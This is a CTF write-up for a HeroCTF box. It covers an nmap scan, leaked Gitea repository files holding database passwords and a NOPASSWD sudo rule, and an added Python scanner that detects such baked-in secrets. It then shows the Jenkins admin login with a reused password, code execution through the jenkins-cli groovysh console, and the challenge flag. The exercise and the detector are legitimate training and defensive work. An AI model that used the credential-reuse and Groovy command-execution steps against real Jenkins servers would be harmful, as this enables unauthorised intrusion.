DevOps User
Category: Box
300 points
Can you find the user.txt flag on the box?
URL: http://box.heroctf.fr (only the Docker containers are in scope, not the real machine behind them)
The machine resets itself every hour, so keep track of your work!
Format: Hero{}
Author : xanhacks
nmap.txt
$ nmap -p 3000,8080,2222 box.heroctf.fr -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 22:30 CEST
Nmap scan report for box.heroctf.fr (35.246.63.133)
Host is up (0.019s latency).
rDNS record for 35.246.63.133: 133.63.246.35.bc.googleusercontent.com
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 8.1 (protocol 2.0)
3000/tcp open ppp?
8080/tcp open http Jetty 9.2.z-SNAPSHOT
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.06 seconds
Solution
I really enjoyed this challenge. I started with recon.
On 8080/tcp I found a hosted Jenkins instance. On 3000/tcp was Gitea.
In the heroes/Infra repository I found the infrastructure Dockerfiles, together with docker-compose.yml and .env.
.env
MYSQL_ROOT_PASSWORD=P3WaHFLYesa8BNVGyuAL
MYSQL_PASSWORD=P3WaHFLYesa8BNVGyuAL
Dockerfile.gitea
FROM gitea/gitea:1.12.4
COPY ./files/root.txt /root/root.txt
RUN chown root:root /root/root.txt
RUN chmod 400 /root/root.txt
RUN apk add gcc git libffi-dev musl-dev openssl-dev perl py-pip python python-dev sshpass
RUN python -m pip install git+git://github.com/ansible/ansible.git@devel
RUN apk add sudo
RUN echo "git:heroes" | chpasswd
RUN echo "git ALL=(ALL) NOPASSWD:/usr/bin/ansible-playbook" >> /etc/sudoers
Dockerfile.jenkins
FROM jenkins:2.60.3
USER root
COPY ./files/user.txt /var/jenkins_home/user.txt
RUN chown root:root /var/jenkins_home/user.txt
RUN chmod 400 /var/jenkins_home/user.txt
USER jenkins
docker-compose.yml
---
version: '3'
services:
  jenkins:
    build:
      context: .
      dockerfile: Dockerfile.jenkins
    hostname: gentleman
    container_name: jenkins
    restart: always
    ports:
      - "8080:8080"
      - "50000:50000"
    volumes:
      - "./jenkins_home/:/var/jenkins_home/:rw"
  gitea:
    build:
      context: .
      dockerfile: Dockerfile.gitea
    restart: always
    hostname: gitea
    container_name: gitea
    volumes:
      - ./data:/data
    ports:
      - "3000:3000"
      - "2222:22"
    depends_on:
      - db
  db:
    image: mariadb:10
    restart: always
    hostname: mariadb
    container_name: mariadb
    environment:
      - MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}
      - MYSQL_DATABASE=gitea
      - MYSQL_USER=gitea
      - MYSQL_PASSWORD=${MYSQL_PASSWORD}
    volumes:
      - ./db/:/var/lib/mysql
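The three files above are the whole story of this box: a committed .env with database passwords, a Dockerfile that sets a user password with an inline chpasswd and grants a NOPASSWD sudo rule, and a compose file that only references those values through ${VAR} interpolation (harmless on its own, fatal once .env is in the repository). The scanner below is an added example, not code from the writeup or from the heroes/Infra repository; it runs a few constructed rules over sample file contents modelled on the page and also reports any secret literal that is reused across files, which is the password-reuse pattern the rest of this solution depends on. Rule names, the Finding structure and the sample texts are assumptions made for this example.

```python
"""Scan build and deployment files for baked-in credentials.

Added example (not part of the original writeup): the rules and sample
files below are constructed to flag the patterns visible in the page's
.env, Dockerfile.gitea and docker-compose.yml.
"""
import re
from collections import Counter, namedtuple

Finding = namedtuple("Finding", "path lineno rule secret line")

# Constructed samples modelled on the files found in heroes/Infra.
SAMPLE_FILES = {
    ".env": (
        "MYSQL_ROOT_PASSWORD=P3WaHFLYesa8BNVGyuAL\n"
        "MYSQL_PASSWORD=P3WaHFLYesa8BNVGyuAL\n"
    ),
    "Dockerfile.gitea": (
        "FROM gitea/gitea:1.12.4\n"
        "RUN apk add sudo\n"
        'RUN echo "git:heroes" | chpasswd\n'
        'RUN echo "git ALL=(ALL) NOPASSWD:/usr/bin/ansible-playbook" >> /etc/sudoers\n'
    ),
    "docker-compose.yml": (
        "    environment:\n"
        "      - MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}\n"
        "      - MYSQL_PASSWORD=${MYSQL_PASSWORD}\n"
    ),
}

# Each rule is (name, regex); a named group "secret" captures the value when there is one.
RULES = [
    # RUN echo "user:password" | chpasswd -> the password lives in an image layer forever
    ("inline-chpasswd",
     re.compile(r'echo\s+["\']?[^\s"\':]+:(?P<secret>[^"\'\s|]+)["\']?\s*\|\s*chpasswd')),
    # a sudoers rule that runs a command without a password prompt
    ("sudoers-nopasswd", re.compile(r"\bNOPASSWD\b")),
    # KEY=value lines (plain .env, Dockerfile ENV/ARG, or compose "- KEY=value")
    # whose name suggests a credential
    ("secret-literal",
     re.compile(r"^\s*(?:-\s*)?(?:(?:ENV|ARG)\s+)?"
                r"[A-Z0-9_]*(?:PASSWORD|PASSWD|SECRET|TOKEN)[A-Z0-9_]*"
                r"\s*=\s*(?P<secret>\S+)\s*$")),
]


def scan_text(path, text):
    """Return one Finding per (line, rule) match in a single file's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            match = pattern.search(line)
            if not match:
                continue
            secret = match.groupdict().get("secret")
            # ${VAR} is interpolated at deploy time, not a literal in this file
            if secret is not None and secret.startswith("${"):
                continue
            findings.append(Finding(path, lineno, rule, secret, line.strip()))
    return findings


def scan_files(files):
    """Scan a mapping of path -> text and concatenate the findings."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def reused_secrets(findings):
    """Secret values that occur more than once: one leak then unlocks several systems."""
    counts = Counter(f.secret for f in findings if f.secret)
    return {value for value, n in counts.items() if n > 1}


if __name__ == "__main__":
    results = scan_files(SAMPLE_FILES)
    for f in results:
        print(f"{f.path}:{f.lineno} [{f.rule}] {f.line}")
    for value in reused_secrets(results):
        print(f"reused secret: {value}")
```

Running the module prints four findings (two database passwords, the inline chpasswd and the NOPASSWD rule) and flags the database password as reused; the compose file produces nothing because its values are ${VAR} references, which is exactly why committing the .env beside it undoes that indirection.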
I used the password heroes (from Dockerfile.gitea) to log in to the Jenkins admin account.
I don't have much experience with Jenkins, but I found that you can connect to it with a command-line tool named jenkins-cli.jar.
java -jar jenkins-cli.jar -s http://box.heroctf.fr:8080/ groovysh --username admin --password heroes
Groovy Shell (2.4.8, JVM: 1.8.0_171)
Type ':help' or ':h' for help.
-------------------------------------------------------------------------------
groovy:000>
At first I was a bit lost (I'm not a Java guy ;-)), which is why I retrieved the flag as shown below.
groovy:000> new File ("/var/jenkins_home/user.txt").eachLine { line ->
groovy:001> println line
groovy:002> }
Hero{dc97a2f7da5304d12fe820bd2a6d343d}
===> null
groovy:000>
Later I realized that you can run shell commands with a small trick (example below), which makes it a bit easier.
groovy:000> "cat /var/jenkins_home/user.txt".execute().text
===> Hero{dc97a2f7da5304d12fe820bd2a6d343d}
Much easier ;-)
Flag
Hero{dc97a2f7da5304d12fe820bd2a6d343d}